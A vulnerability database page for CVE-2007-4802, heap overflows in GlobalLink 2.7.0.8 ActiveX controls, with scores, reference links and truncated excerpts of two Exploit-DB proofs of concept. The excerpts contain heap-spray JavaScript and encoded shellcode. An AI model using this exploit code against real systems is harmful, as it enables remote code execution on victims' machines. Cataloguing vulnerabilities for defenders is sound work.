CVE-2007-4802
published 2007-09-11CVE-2007-4802: Multiple heap-based buffer overflows in GlobalLink 2.7.0.8 allow remote attackers to execute arbitrary code via (1) a long eighth argument to the SetInfo…
PriorityP333medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.96%
94.6th percentile
Multiple heap-based buffer overflows in GlobalLink 2.7.0.8 allow remote attackers to execute arbitrary code via (1) a long eighth argument to the SetInfo method in a certain ActiveX control in glItemCom.dll or (2) a long second argument to the SetClientInfo method in a certain ActiveX control in glitemflat.dll.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ourgame.com | globallink | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow
exploitdb·2007-09-07
CVE-2007-4802 GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow
GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow
---
document.write("");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
//just pop up a MessageBox
"%u0eeb%u4b5b%uc933%ubfb1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe67%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%uc716%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufeda%ufefe%u96ac%u91d0%u998c%u9096%uce8a%u9693%u8edd%uca96%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u019c%u0101%u8acc%uf26f%u7187%u9e32%uf494%ue0c6%u3344%u4d2e%u3a4b%u968d%u
Exploit-DB
GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow
exploitdb·2007-09-05
CVE-2007-4802 GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow
GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow
---
document.write("");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
// exec calc
"%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513" +
"%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69" +
"%u45c9%u6c9e%ucf8d%ue20d%ud6ba%u3669%ucfd5%u2009" +
"%ufa7e%u6869%uff1b%uf022%u4a59%u1d22%u0ff2%u6428" +
"%u0cf4%u9d09%u9ace%u6dc6%u2b80%u3669%ucfd1%u0f09" +
"%uc27e%ue2a9%ud2aa%u82e3%ud27e%u6869%u471e%u4dbe" +
"%u0df1%ua9d3%u4591%u59a2%u0e70%u659a%u8e7e%ue2ee" +
"%ud285%ue24f%uc69d%u6009%u4e7e%u6952%ucef5%u0169" +
"%u91c9%u9fd3%u9895%u916b%u0e76%u3999%u3e9d%u6d68" +
"%ua6aa%u977a%uc07f%u96b5%uad12%u0583%uce96%u69e2"
);
var heapBlockSize = 0x100000;
var payLoadSize = sh
No writeups or analysis indexed.
http://osvdb.org/45886http://osvdb.org/45887http://www.securityfocus.com/bid/25565http://www.securityfocus.com/bid/25586https://exchange.xforce.ibmcloud.com/vulnerabilities/36470https://exchange.xforce.ibmcloud.com/vulnerabilities/36501https://www.exploit-db.com/exploits/4366https://www.exploit-db.com/exploits/4372http://osvdb.org/45886http://osvdb.org/45887http://www.securityfocus.com/bid/25565http://www.securityfocus.com/bid/25586https://exchange.xforce.ibmcloud.com/vulnerabilities/36470https://exchange.xforce.ibmcloud.com/vulnerabilities/36501https://www.exploit-db.com/exploits/4366https://www.exploit-db.com/exploits/4372
2007-09-11
Published